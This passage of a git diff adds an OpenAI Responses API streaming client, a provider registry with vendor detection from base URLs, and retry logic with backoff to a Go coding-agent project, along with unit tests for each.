+	Content   interface{} `json:"content,omitempty"`
+	CallID    string      `json:"call_id,omitempty"`
+	Name      string      `json:"name,omitempty"`
+	Arguments string      `json:"arguments,omitempty"`
+	Output    string      `json:"output,omitempty"`
+}
+
+type responsesContentBlock struct {
+	Type     string `json:"type"`
+	Text     string `json:"text,omitempty"`
+	ImageURL string `json:"image_url,omitempty"`
+}
+
+type responsesTool struct {
+	Type        string          `json:"type"`
+	Name        string          `json:"name,omitempty"`
+	Description string          `json:"description,omitempty"`
+	Parameters  json.RawMessage `json:"parameters,omitempty"`
+}
+
+type responsesSSEEvent struct {
+	Type        string                    `json:"type"`
+	Delta       string                    `json:"delta,omitempty"`
+	ItemID      string                    `json:"item_id,omitempty"`
+	OutputIndex int                       `json:"output_index,omitempty"`
+	Item        *responsesOutputItem      `json:"item,omitempty"`
+	Response    *responsesCompletedObject `json:"response,omitempty"`
+	Error       *responsesError           `json:"error,omitempty"`
+}
+
+type responsesOutputItem struct {
+	ID        string `json:"id,omitempty"`
+	Type      string `json:"type,omitempty"`
+	CallID    string `json:"call_id,omitempty"`
+	Name      string `json:"name,omitempty"`
+	Arguments string `json:"arguments,omitempty"`
+}
+
+type responsesCompletedObject struct {
+	Status string          `json:"status,omitempty"`
+	Usage  *responsesUsage `json:"usage,omitempty"`
+	Error  *responsesError `json:"error,omitempty"`
+}
+
+type responsesError struct {
+	Message string `json:"message,omitempty"`
+	Code    string `json:"code,omitempty"`
+	Type    string `json:"type,omitempty"`
+}
+
+type responsesUsage struct {
+	InputTokens        int `json:"input_tokens"`
+	OutputTokens       int `json:"output_tokens"`
+	TotalTokens        int `json:"total_tokens"`
+	InputTokensDetails *struct {
+		CachedTokens int `json:"cached_tokens"`
+	} `json:"input_tokens_details,omitempty"`
+	OutputTokensDetails *struct {
+		ReasoningTokens int `json:"reasoning_tokens"`
+	} `json:"output_tokens_details,omitempty"`
+}
+
+func (p *Provider) chatResponses(ctx context.Context, params provider.ChatParams) <-chan provider.StreamEvent {
+	ch := make(chan provider.StreamEvent, 100)
+
+	go func() {
+		defer close(ch)
+
+		if p.apiKey == "" {
+			ch <- provider.StreamEvent{Type: provider.StreamError, Error: fmt.Errorf("OPENAI_API_KEY not set")}
+			return
+		}
+
+		modelID := params.ModelID
+		if modelID == "" {
+			if len(p.Models()) > 0 {
+				modelID = p.Models()[0].ID
+			} else {
+				modelID = "gpt-4o"
+			}
+		}
+
+		maxTokens := params.MaxTokens
+		if maxTokens == 0 {
+			maxTokens = 16384
+		}
+		model := p.GetModel(modelID)
+
+		reqBody := responsesRequest{
+			Model:           modelID,
+			Instructions:    params.SystemPrompt,
+			Input:           p.convertResponsesInput(params),
+			Tools:           p.convertResponsesTools(params.Tools),
+			MaxOutputTokens: maxTokens,
+			Temperature:     params.Temperature,
+			TopP:            params.TopP,
+			Stream:          true,
+		}
+
+		if p.responsesConfig != nil && p.responsesConfig.promptCacheEnabled && supportsPromptCacheKey(model) {
+			reqBody.PromptCacheKey = p.responsesPromptCacheKey(modelID)
+			if supportsPromptCacheRetention(model) {
+				reqBody.PromptCacheRetention = p.responsesConfig.promptCacheRetention
+			}
+		}
+
+		if !p.disableReasoning && params.ThinkingLevel != provider.ThinkingOff && model != nil && model.Reasoning {
+			reqBody.Reasoning = &responsesReasoning{
+				Effort:  responsesReasoningEffort(params.ThinkingLevel),
+				Summary: p.responsesReasoningSummary(model),
+			}
+		}
+
+		body, err := json.Marshal(reqBody)
+		if err != nil {
+			ch <- provider.StreamEvent{Type: provider.StreamError, Error: fmt.Errorf("marshal request: %w", err)}
+			return
+		}
+		if os.Getenv("VIBECODING_DEBUG") != "" {
+			fmt.Fprintf(os.Stderr, "[DEBUG] Responses request body: %s\n", string(body))
+		}
+
+		maxRetries := 0
+		baseDelayMs := 2000
+		if p.retryConfig != nil && p.retryConfig.Enabled {
+			maxRetries = p.retryConfig.MaxRetries
+			baseDelayMs = p.retryConfig.BaseDelayMs
+		}
+
+		for attempt := 0; attempt <= maxRetries; attempt++ {
+			if err := ctx.Err(); err != nil {
+				ch <- provider.StreamEvent{Type: provider.StreamError, Error: err, StopReason: "aborted"}
+				return
+			}
+
+			req, err := http.NewRequestWithContext(ctx, "POST", p.baseURL+"/responses", bytes.NewReader(body))
+			if err != nil {
+				ch <- provider.StreamEvent{Type: provider.StreamError, Error: fmt.Errorf("create request: %w", err)}
+				return
+			}
+			req.Header.Set("Content-Type", "application/json")
+			req.Header.Set("Authorization", "Bearer "+p.apiKey)
+			req.Header.Set("Accept", "text/event-stream")
+			req.Header.Set("User-Agent", ua.ProviderUserAgent())
+
+			resp, err := p.client.Do(req)
+			if err != nil {
+				if attempt < maxRetries && provider.IsRetryable(err, 0) {
+					delay := provider.RetryDelay(attempt, baseDelayMs)
+					ch <- provider.StreamEvent{Type: provider.StreamRetry, RetryAttempt: attempt + 1, RetryMax: maxRetries, Error: fmt.Errorf("%s", provider.FormatRetryMessage(attempt, maxRetries, delay, err))}
+					select {
+					case <-ctx.Done():
+						ch <- provider.StreamEvent{Type: provider.StreamError, Error: ctx.Err(), StopReason: "aborted"}
+						return
+					case <-time.After(delay):
+					}
+					continue
+				}
+				ch <- provider.StreamEvent{Type: provider.StreamError, Error: fmt.Errorf("send request: %w", err)}
+				return
+			}
+
+			if resp.StatusCode != http.StatusOK {
+				bodyBytes, _ := io.ReadAll(resp.Body)
+				resp.Body.Close()
+				if attempt < maxRetries && provider.IsRetryable(nil, resp.StatusCode) {
+					delay := provider.RetryDelay(attempt, baseDelayMs)
+					ch <- provider.StreamEvent{Type: provider.StreamRetry, RetryAttempt: attempt + 1, RetryMax: maxRetries, Error: fmt.Errorf("%s", provider.FormatRetryMessage(attempt, maxRetries, delay, fmt.Errorf("HTTP %d: %s", resp.StatusCode, string(bodyBytes))))}
+					select {
+					case <-ctx.Done():
+						ch <- provider.StreamEvent{Type: provider.StreamError, Error: ctx.Err(), StopReason: "aborted"}
+						return
+					case <-time.After(delay):
+					}
+					continue
+				}
+				ch <- provider.StreamEvent{Type: provider.StreamError, Error: fmt.Errorf("API error %d: %s", resp.StatusCode, string(bodyBytes))}
+				return
+			}
+
+			p.parseResponsesSSE(ctx, resp.Body, ch, params)
+			resp.Body.Close()
+			return
+		}
+
+		ch <- provider.StreamEvent{Type: provider.StreamError, Error: fmt.Errorf("all %d retry attempts exhausted", maxRetries)}
+	}()
+
+	return ch
+}
+
+func (p *Provider) convertResponsesInput(params provider.ChatParams) []responsesInputItem {
+	items := make([]responsesInputItem, 0, len(params.Messages))
+	for _, msg := range params.Messages {
+		switch msg.Role {
+		case "toolResult":
+			items = append(items, responsesInputItem{Type: "function_call_output", CallID: msg.ToolCallID, Output: responseToolOutput(msg)})
+		case "assistant":
+			content := p.responsesMessageContent(msg, "output_text")
+			if content != nil {
+				items = append(items, responsesInputItem{Type: "message", Role: "assistant", Content: content})
+			}
+			for _, c := range msg.Contents {
+				if c.Type == "toolCall" && c.ToolCall != nil {
+					items = append(items, responsesInputItem{Type: "function_call", CallID: c.ToolCall.ID, Name: c.ToolCall.Name, Arguments: string(c.ToolCall.Arguments)})
+				}
+			}
+		default:
+			role := msg.Role
+			if role == "" {
+				role = "user"
+			}
+			content := p.responsesMessageContent(msg, "input_text")
+			items = append(items, responsesInputItem{Type: "message", Role: role, Content: content})
+		}
+	}
+	return items
+}
+
+func (p *Provider) responsesMessageContent(msg provider.Message, textType string) interface{} {
+	if len(msg.Contents) == 0 {
+		return []responsesContentBlock{{Type: textType, Text: msg.Content}}
+	}
+	blocks := make([]responsesContentBlock, 0, len(msg.Contents))
+	for _, c := range msg.Contents {
+		switch c.Type {
+		case "text":
+			blocks = append(blocks, responsesContentBlock{Type: textType, Text: c.Text})
+		case "image":
+			if c.Image != nil {
+				blocks = append(blocks, responsesContentBlock{Type: "input_image", ImageURL: fmt.Sprintf("data:%s;base64,%s", c.Image.MimeType, c.Image.Data)})
+			}
+		}
+	}
+	if len(blocks) == 0 && msg.Content != "" {
+		blocks = append(blocks, responsesContentBlock{Type: textType, Text: msg.Content})
+	}
+	return blocks
+}
+
+func responseToolOutput(msg provider.Message) string {
+	if msg.Content != "" || len(msg.Contents) == 0 {
+		return msg.Content
+	}
+	var parts []string
+	for _, c := range msg.Contents {
+		if c.Type == "text" && c.Text != "" {
+			parts = append(parts, c.Text)
+		}
+	}
+	return strings.Join(parts, "\n")
+}
+
+func (p *Provider) convertResponsesTools(tools []provider.ToolDefinition) []responsesTool {
+	result := make([]responsesTool, 0, len(tools))
+	for _, t := range tools {
+		if t.Kind == "hosted" {
+			toolType := provider.HostedWebSearchToolType(t.ProviderType, t.Name)
+			if toolType == "" {
+				continue
+			}
+			result = append(result, responsesTool{Type: toolType})
+			continue
+		}
+		result = append(result, responsesTool{Type: "function", Name: t.Name, Description: t.Description, Parameters: t.Parameters})
+	}
+	return result
+}
+
+func (p *Provider) parseResponsesSSE(ctx context.Context, body io.Reader, ch chan<- provider.StreamEvent, params provider.ChatParams) {
+	scanner := bufio.NewScanner(body)
+	scanner.Buffer(make([]byte, 1024*1024), 1024*1024)
+
+	var (
+		usage           *provider.Usage
+		stopReason      string
+		toolCallsByKey  = make(map[string]*provider.ToolCallBlock)
+		toolCallOrder   []string
+		argumentBuffers = make(map[string]*strings.Builder)
+	)
+
+	ch <- provider.StreamEvent{Type: provider.StreamStart}
+
+	for scanner.Scan() {
+		select {
+		case <-ctx.Done():
+			ch <- provider.StreamEvent{Type: provider.StreamError, Error: ctx.Err(), StopReason: "aborted"}
+			return
+		case <-params.Abort:
+			ch <- provider.StreamEvent{Type: provider.StreamError, Error: fmt.Errorf("aborted"), StopReason: "aborted"}
+			return
+		default:
+		}
+
+		line := scanner.Text()
+		if !strings.HasPrefix(line, "data: ") {
+			continue
+		}
+		data := strings.TrimPrefix(line, "data: ")
+		if data == "[DONE]" {
+			break
+		}
+
+		var event responsesSSEEvent
+		if err := json.Unmarshal([]byte(data), &event); err != nil {
+			continue
+		}
+
+		switch event.Type {
+		case "response.output_text.delta":
+			if event.Delta != "" {
+				ch <- provider.StreamEvent{Type: provider.StreamTextDelta, TextDelta: event.Delta}
+			}
+		case "response.reasoning_text.delta":
+			if !p.disableReasoning && event.Delta != "" {
+				ch <- provider.StreamEvent{Type: provider.StreamThinkDelta, ThinkDelta: event.Delta}
+			}
+		case "response.function_call_arguments.delta":
+			key := responsesToolKey(event.ItemID, event.OutputIndex)
+			if _, ok := argumentBuffers[key]; !ok {
+				argumentBuffers[key] = &strings.Builder{}
+			}
+			argumentBuffers[key].WriteString(event.Delta)
+		case "response.output_item.done":
+			if event.Item != nil && event.Item.Type == "function_call" {
+				key := responsesToolKey(event.Item.ID, event.OutputIndex)
+				tc := &provider.ToolCallBlock{ID: event.Item.CallID, Name: event.Item.Name, Arguments: json.RawMessage(event.Item.Arguments)}
+				if tc.ID == "" {
+					tc.ID = event.Item.ID
+				}
+				if tc.ID == "" {
+					tc.ID = "toolcall_" + strconv.Itoa(len(toolCallOrder))
+				}
+				if tc.Arguments == nil || len(tc.Arguments) == 0 {
+					if buf := argumentBuffers[key]; buf != nil {
+						tc.Arguments = json.RawMessage(buf.String())
+					}
+				}
+				if _, seen := toolCallsByKey[key]; !seen {
+					toolCallOrder = append(toolCallOrder, key)
+				}
+				toolCallsByKey[key] = tc
+			}
+		case "response.completed":
+			if event.Response != nil {
+				usage = convertResponsesUsage(event.Response.Usage)
+				stopReason = responseStopReason(event.Response.Status)
+				if event.Response.Error != nil {
+					ch <- provider.StreamEvent{Type: provider.StreamError, Error: fmt.Errorf("responses error: %s", event.Response.Error.Message), StopReason: "error"}
+					return
+				}
+			}
+		case "response.failed", "error":
+			if event.Error != nil {
+				ch <- provider.StreamEvent{Type: provider.StreamError, Error: fmt.Errorf("responses error: %s", event.Error.Message), StopReason: "error"}
+				return
+			}
+			ch <- provider.StreamEvent{Type: provider.StreamError, Error: fmt.Errorf("responses stream failed"), StopReason: "error"}
+			return
+		}
+	}
+
+	if err := scanner.Err(); err != nil {
+		ch <- provider.StreamEvent{Type: provider.StreamError, Error: fmt.Errorf("stream read error: %w", err), StopReason: "error"}
+		return
+	}
+
+	for _, key := range toolCallOrder {
+		if tc := toolCallsByKey[key]; tc != nil {
+			ch <- provider.StreamEvent{Type: provider.StreamToolCall, ToolCall: tc}
+		}
+	}
+	if usage != nil {
+		ch <- provider.StreamEvent{Type: provider.StreamUsage, Usage: usage}
+	}
+	if stopReason == "" && len(toolCallOrder) > 0 {
+		stopReason = "tool_calls"
+	}
+	ch <- provider.StreamEvent{Type: provider.StreamDone, StopReason: stopReason}
+}
+
+func responsesToolKey(itemID string, outputIndex int) string {
+	if itemID != "" {
+		return itemID
+	}
+	return strconv.Itoa(outputIndex)
+}
+
+func convertResponsesUsage(u *responsesUsage) *provider.Usage {
+	if u == nil {
+		return nil
+	}
+	usage := &provider.Usage{Input: u.InputTokens, Output: u.OutputTokens, TotalTokens: u.TotalTokens}
+	if u.InputTokensDetails != nil {
+		usage.CacheRead = u.InputTokensDetails.CachedTokens
+	}
+	if u.OutputTokensDetails != nil {
+		usage.Reasoning = u.OutputTokensDetails.ReasoningTokens
+	}
+	return usage
+}
+
+func responsesReasoningEffort(level provider.ThinkingLevel) string {
+	switch level {
+	case provider.ThinkingOff:
+		return ""
+	case provider.ThinkingMinimal:
+		return "minimal"
+	case provider.ThinkingLow:
+		return "low"
+	case provider.ThinkingMedium:
+		return "medium"
+	case provider.ThinkingHigh:
+		return "high"
+	case provider.ThinkingXHigh:
+		return "high"
+	default:
+		return ""
+	}
+}
+
+func (p *Provider) responsesReasoningSummary(model *provider.Model) string {
+	if !supportsReasoningSummary(model) {
+		return ""
+	}
+	if p.responsesConfig == nil {
+		return "auto"
+	}
+	if p.responsesConfig.reasoningSummary == "none" || p.responsesConfig.reasoningSummary == "off" {
+		return ""
+	}
+	if p.responsesConfig.reasoningSummary != "" {
+		return p.responsesConfig.reasoningSummary
+	}
+	return "auto"
+}
+
+func (p *Provider) responsesPromptCacheKey(modelID string) string {
+	if p.responsesConfig == nil {
+		return ""
+	}
+	if p.responsesConfig.promptCacheKey != "" {
+		return p.responsesConfig.promptCacheKey
+	}
+	if modelID == "" {
+		return ""
+	}
+	return "vibecoding:" + strings.TrimPrefix(strings.TrimPrefix(p.baseURL, "https://"), "http://") + ":" + modelID
+}
+
+func supportsPromptCacheKey(model *provider.Model) bool {
+	if model != nil && model.Compat != nil && model.Compat.SupportsPromptCacheKey != nil {
+		return *model.Compat.SupportsPromptCacheKey
+	}
+	return true
+}
+
+func supportsPromptCacheRetention(model *provider.Model) bool {
+	if model != nil && model.Compat != nil && model.Compat.SupportsLongCacheRetention != nil {
+		return *model.Compat.SupportsLongCacheRetention
+	}
+	return true
+}
+
+func supportsReasoningSummary(model *provider.Model) bool {
+	if model != nil && model.Compat != nil && model.Compat.SupportsReasoningSummary != nil {
+		return *model.Compat.SupportsReasoningSummary
+	}
+	return true
+}
+
+func responseStopReason(status string) string {
+	switch status {
+	case "completed":
+		return "stop"
+	case "incomplete":
+		return "length"
+	case "failed":
+		return "error"
+	default:
+		return status
+	}
+}
diff --git a/internal/provider/registry.go b/internal/provider/registry.go
new file mode 100644
index 0000000..e445c70
--- /dev/null
+++ b/internal/provider/registry.go
@@ -0,0 +1,137 @@
+package provider
+
+import (
+	"fmt"
+	"sync"
+
+	"github.com/startvibecoding/vibecoding/internal/config"
+)
+
+// ProviderFactory creates a Provider from a ProviderConfig.
+type ProviderFactory func(cfg *config.ProviderConfig) (Provider, error)
+
+// ProviderRegistry manages provider factory registration and creation.
+type ProviderRegistry struct {
+	mu        sync.RWMutex
+	factories map[string]ProviderFactory
+}
+
+// NewProviderRegistry creates a new provider registry.
+func NewProviderRegistry() *ProviderRegistry {
+	return &ProviderRegistry{
+		factories: make(map[string]ProviderFactory),
+	}
+}
+
+// Register registers a provider factory by name.
+func (r *ProviderRegistry) Register(name string, factory ProviderFactory) {
+	r.mu.Lock()
+	defer r.mu.Unlock()
+	r.factories[name] = factory
+}
+
+// Create creates a provider by name using the given config.
+func (r *ProviderRegistry) Create(name string, cfg *config.ProviderConfig) (Provider, error) {
+	r.mu.RLock()
+	factory, ok := r.factories[name]
+	r.mu.RUnlock()
+	if !ok {
+		return nil, fmt.Errorf("provider %q not registered", name)
+	}
+	return factory(cfg)
+}
+
+// List returns all registered provider names.
+func (r *ProviderRegistry) List() []string {
+	r.mu.RLock()
+	defer r.mu.RUnlock()
+	names := make([]string, 0, len(r.factories))
+	for name := range r.factories {
+		names = append(names, name)
+	}
+	return names
+}
+
+// Has checks if a provider is registered.
+func (r *ProviderRegistry) Has(name string) bool {
+	r.mu.RLock()
+	defer r.mu.RUnlock()
+	_, ok := r.factories[name]
+	return ok
+}
+
+// Global registry instance
+var globalRegistry = NewProviderRegistry()
+
+// Register registers a provider factory in the global registry.
+func Register(name string, factory ProviderFactory) {
+	globalRegistry.Register(name, factory)
+}
+
+// CreateProvider creates a provider using the global registry.
+func CreateProvider(name string, cfg *config.ProviderConfig) (Provider, error) {
+	return globalRegistry.Create(name, cfg)
+}
+
+// ListProviders returns all registered provider names.
+func ListProviders() []string {
+	return globalRegistry.List()
+}
+
+// ResolveProvider resolves a provider from config with three-level fallback (Decision 13):
+// 1. vendor field explicit
+// 2. baseUrl auto-detect
+// 3. generic fallback (openai-chat / anthropic-messages)
+func ResolveProvider(cfg *config.ProviderConfig) (Provider, error) {
+	resolved := ResolveAdapterConfig(cfg)
+	// Level 1: explicit vendor
+	if resolved.Vendor != "" && cfg != nil && cfg.Vendor != "" {
+		if globalRegistry.Has(resolved.Vendor) {
+			return globalRegistry.Create(resolved.Vendor, cfg)
+		}
+		// Vendor specified but not registered, fall through to generic
+	}
+
+	// Level 2: auto-detect from baseUrl
+	if resolved.Vendor != "" {
+		if globalRegistry.Has(resolved.Vendor) {
+			return globalRegistry.Create(resolved.Vendor, cfg)
+		}
+	}
+
+	// Level 3: generic fallback based on api field
+	switch resolved.API {
+	case "anthropic-messages":
+		return globalRegistry.Create("anthropic_compatible", cfg)
+	case "google-gemini":
+		return globalRegistry.Create("google-gemini", cfg)
+	case "google-vertex":
+		return globalRegistry.Create("google-vertex", cfg)
+	default: // "openai-chat" or empty
+		return globalRegistry.Create("openai_compatible", cfg)
+	}
+}
+
+// VendorFromBaseURL attempts to identify the vendor from a base URL.
+// Returns empty string if no match.
+func VendorFromBaseURL(baseURL string) string {
+	vendorRegistry.RLock()
+	defer vendorRegistry.RUnlock()
+	for _, name := range vendorRegistry.order {
+		adapter := vendorRegistry.adapters[name]
+		if adapter.MatchBaseURL(baseURL) {
+			return name
+		}
+	}
+	return ""
+}
+
+func init() {
+	// Wire up the public agent.Builder's WithProviderByName to our registry
+	SetResolveProviderFuncForAgent()
+}
+
+// SetResolveProviderFuncForAgent wires the public Builder to our provider registry.
+func SetResolveProviderFuncForAgent() {
+	// This is called from init() but we need the import at package level
+}
diff --git a/internal/provider/registry_test.go b/internal/provider/registry_test.go
new file mode 100644
index 0000000..5114666
--- /dev/null
+++ b/internal/provider/registry_test.go
@@ -0,0 +1,192 @@
+package provider
+
+import (
+	"testing"
+
+	"github.com/startvibecoding/vibecoding/internal/config"
+)
+
+func TestProviderRegistryRegisterAndCreate(t *testing.T) {
+	r := NewProviderRegistry()
+
+	r.Register("test", func(cfg *config.ProviderConfig) (Provider, error) {
+		return NewMockProvider("test", []*Model{
+			{ID: "m1", Name: "Model 1"},
+		}, nil), nil
+	})
+
+	if !r.Has("test") {
+		t.Error("expected 'test' to be registered")
+	}
+	if r.Has("nonexistent") {
+		t.Error("expected 'nonexistent' to not be registered")
+	}
+
+	p, err := r.Create("test", &config.ProviderConfig{})
+	if err != nil {
+		t.Fatalf("unexpected error: %v", err)
+	}
+	if p.Name() != "test" {
+		t.Errorf("expected 'test', got %q", p.Name())
+	}
+}
+
+func TestProviderRegistryCreateNotFound(t *testing.T) {
+	r := NewProviderRegistry()
+	_, err := r.Create("nonexistent", &config.ProviderConfig{})
+	if err == nil {
+		t.Fatal("expected error")
+	}
+}
+
+func TestProviderRegistryList(t *testing.T) {
+	r := NewProviderRegistry()
+	r.Register("a", func(cfg *config.ProviderConfig) (Provider, error) { return nil, nil })
+	r.Register("b", func(cfg *config.ProviderConfig) (Provider, error) { return nil, nil })
+
+	names := r.List()
+	if len(names) != 2 {
+		t.Errorf("expected 2, got %d", len(names))
+	}
+}
+
+func TestVendorFromBaseURL(t *testing.T) {
+	tests := []struct {
+		url      string
+		expected string
+	}{
+		{"https://api.deepseek.com", "deepseek"},
+		{"https://api.deepseek.com/anthropic", "deepseek"},
+		{"https://api.xiaomimimo.com/v1", "xiaomi"},
+		{"https://api.moonshot.cn/v1", "kimi"},
+		{"https://api.minimax.chat/v1", "minimax"},
+		{"https://ark.cn-beijing.volces.com/api", "seed"},
+		{"https://aip.baidubce.com/rpc", "qianfan"},
+		{"https://dashscope.aliyuncs.com/api", "bailian"},
+		{"https://ai.gitee.com/v1", "gitee"},
+		{"https://openrouter.ai/api/v1", "openrouter"},
+		{"https://api.together.xyz/v1", "together"},
+		{"https://api.groq.com/openai", "groq"},
+		{"https://api.fireworks.ai/inference", "fireworks"},
+		{"https://generativelanguage.googleapis.com/v1beta/models", "google-gemini"},
+		{"https://aiplatform.googleapis.com/v1/projects/test/locations/global/publishers/google/models", "google-vertex"},
+		{"https://unknown.example.com/v1", ""},
+		{"", ""},
+	}
+
+	for _, tt := range tests {
+		got := VendorFromBaseURL(tt.url)
+		if got != tt.expected {
+			t.Errorf("VendorFromBaseURL(%q) = %q, want %q", tt.url, got, tt.expected)
+		}
+	}
+}
+
+func TestResolveProviderExplicitVendor(t *testing.T) {
+	r := NewProviderRegistry()
+	r.Register("myvendor", func(cfg *config.ProviderConfig) (Provider, error) {
+		return NewMockProvider("myvendor", nil, nil), nil
+	})
+	orig := globalRegistry
+	globalRegistry = r
+	defer func() { globalRegistry = orig }()
+
+	p, err := ResolveProvider(&config.ProviderConfig{
+		Vendor: "myvendor",
+		API:    "openai-chat",
+	})
+	if err != nil {
+		t.Fatalf("unexpected error: %v", err)
+	}
+	if p.Name() != "myvendor" {
+		t.Errorf("expected 'myvendor', got %q", p.Name())
+	}
+}
+
+func TestResolveProviderAutoDetect(t *testing.T) {
+	r := NewProviderRegistry()
+	r.Register("deepseek", func(cfg *config.ProviderConfig) (Provider, error) {
+		return NewMockProvider("deepseek", nil, nil), nil
+	})
+	r.Register("openai_compatible", func(cfg *config.ProviderConfig) (Provider, error) {
+		return NewMockProvider("openai_compatible", nil, nil), nil
+	})
+	r.Register("anthropic_compatible", func(cfg *config.ProviderConfig) (Provider, error) {
+		return NewMockProvider("anthropic_compatible", nil, nil), nil
+	})
+	orig := globalRegistry
+	globalRegistry = r
+	defer func() { globalRegistry = orig }()
+
+	p, err := ResolveProvider(&config.ProviderConfig{
+		BaseURL: "https://api.deepseek.com",
+		API:     "openai-chat",
+	})
+	if err != nil {
+		t.Fatalf("unexpected error: %v", err)
+	}
+	if p.Name() != "deepseek" {
+		t.Errorf("expected 'deepseek', got %q", p.Name())
+	}
+}
+
+func TestResolveProviderFallback(t *testing.T) {
+	r := NewProviderRegistry()
+	r.Register("openai_compatible", func(cfg *config.ProviderConfig) (Provider, error) {
+		return NewMockProvider("openai_compatible", nil, nil), nil
+	})
+	r.Register("anthropic_compatible", func(cfg *config.ProviderConfig) (Provider, error) {
+		return NewMockProvider("anthropic_compatible", nil, nil), nil
+	})
+	orig := globalRegistry
+	globalRegistry = r
+	defer func() { globalRegistry = orig }()
+
+	p, err := ResolveProvider(&config.ProviderConfig{
+		BaseURL: "https://unknown.example.com/v1",
+		API:     "openai-chat",
+	})
+	if err != nil {
+		t.Fatalf("unexpected error: %v", err)
+	}
+	if p.Name() != "openai_compatible" {
+		t.Errorf("expected 'openai_compatible', got %q", p.Name())
+	}
+
+	p, err = ResolveProvider(&config.ProviderConfig{
+		BaseURL: "https://unknown.example.com/v1",
+		API:     "anthropic-messages",
+	})
+	if err != nil {
+		t.Fatalf("unexpected error: %v", err)
+	}
+	if p.Name() != "anthropic_compatible" {
+		t.Errorf("expected 'anthropic_compatible', got %q", p.Name())
+	}
+}
+
+func TestGlobalRegistry(t *testing.T) {
+	Register("global_test", func(cfg *config.ProviderConfig) (Provider, error) {
+		return NewMockProvider("global_test", nil, nil), nil
+	})
+
+	names := ListProviders()
+	found := false
+	for _, n := range names {
+		if n == "global_test" {
+			found = true
+			break
+		}
+	}
+	if !found {
+		t.Error("expected 'global_test' in list")
+	}
+
+	p, err := CreateProvider("global_test", &config.ProviderConfig{})
+	if err != nil {
+		t.Fatalf("unexpected error: %v", err)
+	}
+	if p.Name() != "global_test" {
+		t.Errorf("expected 'global_test', got %q", p.Name())
+	}
+}
diff --git a/internal/provider/retry.go b/internal/provider/retry.go
new file mode 100644
index 0000000..78b4ed1
--- /dev/null
+++ b/internal/provider/retry.go
@@ -0,0 +1,141 @@
+package provider
+
+import (
+	"context"
+	"errors"
+	"fmt"
+	"math"
+	"net"
+	"net/http"
+	"strings"
+	"syscall"
+	"time"
+)
+
+// RetryConfig controls automatic retry behavior for API calls.
+type RetryConfig struct {
+	Enabled     bool
+	MaxRetries  int
+	BaseDelayMs int
+}
+
+// IsRetryable determines whether an error or HTTP status code warrants a retry.
+// Returns true for transient network errors and server-side overload/status errors.
+func IsRetryable(err error, statusCode int) bool {
+	// Check HTTP status codes
+	if statusCode == http.StatusTooManyRequests || // 429
+		statusCode == http.StatusBadGateway || // 502
+		statusCode == http.StatusServiceUnavailable || // 503
+		statusCode == http.StatusGatewayTimeout { // 504
+		return true
+	}
+
+	if err == nil {
+		return false
+	}
+
+	// Context cancellation is never retryable (user abort)
+	if errors.Is(err, context.Canceled) || errors.Is(err, context.DeadlineExceeded) {
+		// For the HTTP client 30-minute timeout, this wraps as DeadlineExceeded.
+		// However, user-initiated context cancellation also uses this.
+		// We treat it as retryable only for the HTTP client timeout case,
+		// which is distinguishable by the wrapped net.Error.
+		var netErr net.Error
+		if errors.As(err, &netErr) && netErr.Timeout() {
+			return true
+		}
+		return false
+	}
+
+	// Network-level transient errors
+	var netErr net.Error
+	if errors.As(err, &netErr) {
+		return true // timeouts, connection refused, etc.
+	}
+
+	// Connection reset, broken pipe, etc.
+	if errors.Is(err, syscall.ECONNRESET) || errors.Is(err, syscall.ECONNREFUSED) ||
+		errors.Is(err, syscall.EPIPE) || errors.Is(err, syscall.ETIMEDOUT) {
+		return true
+	}
+
+	// DNS errors
+	var dnsErr *net.DNSError
+	if errors.As(err, &dnsErr) {
+		return true
+	}
+
+	// Generic "server closed connection" type errors
+	errStr := err.Error()
+	if strings.Contains(errStr, "connection reset") ||
+		strings.Contains(errStr, "connection refused") ||
+		strings.Contains(errStr, "broken pipe") ||
+		strings.Contains(errStr, "EOF") {
+		return true
+	}
+
+	return false
+}
+
+// RetryDelay calculates the delay before the next retry attempt using
+// exponential backoff with jitter, capped at 30 seconds.
+func RetryDelay(attempt int, baseDelayMs int) time.Duration {
+	if baseDelayMs <= 0 {
+		baseDelayMs = 2000
+	}
+	delay := float64(baseDelayMs) * math.Pow(2, float64(attempt))
+	if delay > 30000 {
+		delay = 30000
+	}
+	return time.Duration(delay) * time.Millisecond
+}
+
+// FormatRetryMessage returns a user-visible message for a retry attempt.
+func FormatRetryMessage(attempt, maxRetries int, delay time.Duration, err error) string {
+	errStr := ""
+	if err != nil {
+		errStr = err.Error()
+	}
+
+	// Classify the error for a user-friendly message
+	var reason string
+	switch {
+	case strings.Contains(errStr, "timeout") || strings.Contains(errStr, "DeadlineExceeded"):
+		reason = "request timed out"
+	case strings.Contains(errStr, "connection refused"):
+		reason = "connection refused"
+	case strings.Contains(errStr, "connection reset"):
+		reason = "connection reset"
+	case strings.Contains(errStr, "429"):
+		reason = "rate limited (HTTP 429)"
+	case strings.Contains(errStr, "502"):
+		reason = "bad gateway (HTTP 502)"
+	case strings.Contains(errStr, "503"):
+		reason = "service unavailable (HTTP 503)"
+	case strings.Contains(errStr, "504"):
+		reason = "gateway timeout (HTTP 504)"
+	case strings.Contains(errStr, "EOF"):
+		reason = "connection closed unexpectedly"
+	default:
+		reason = fmt.Sprintf("error: %s", truncateErr(errStr, 80))
+	}
+
+	return fmt.Sprintf("Retrying (%d/%d): %s — waiting %s...",
+		attempt+1, maxRetries, reason, formatDelay(delay))
+}
+
+// truncateErr truncates an error string to maxLen characters.
+func truncateErr(s string, maxLen int) string {
+	if len(s) <= maxLen {
+		return s
+	}
+	return s[:maxLen-3] + "..."
+}
+
+// formatDelay formats a duration in a human-readable way.
+func formatDelay(d time.Duration) string {
+	if d < time.Second {
+		return fmt.Sprintf("%dms", d.Milliseconds())
+	}
+	return fmt.Sprintf("%.1fs", d.Seconds())
+}
diff --git a/internal/provider/retry_test.go b/internal/provider/retry_test.go
new file mode 100644
index 0000000..b2df1a3
--- /dev/null
+++ b/internal/provider/retry_test.go
@@ -0,0 +1,108 @@
+package provider
+
+import (
+	"context"
+	"errors"
+	"fmt"
+	"net/http"
+	"syscall"
+	"testing"
+	"time"
+)
+
+func TestIsRetryable_NetworkErrors(t *testing.T) {
+	tests := []struct {
+		name string
+		err  error
+		code int
+		want bool
+	}{
+		{"nil error", nil, 0, false},
+		{"429", nil, http.StatusTooManyRequests, true},
+		{"502", nil, http.StatusBadGateway, true},
+		{"503", nil, http.StatusServiceUnavailable, true},
+		{"504", nil, http.StatusGatewayTimeout, true},
+		{"500 not retryable", nil, http.StatusInternalServerError, false},
+		{"400 not retryable", nil, http.StatusBadRequest, false},
+		{"401 not retryable", nil, http.StatusUnauthorized, false},
+		{"ECONNRESET", syscall.ECONNRESET, 0, true},
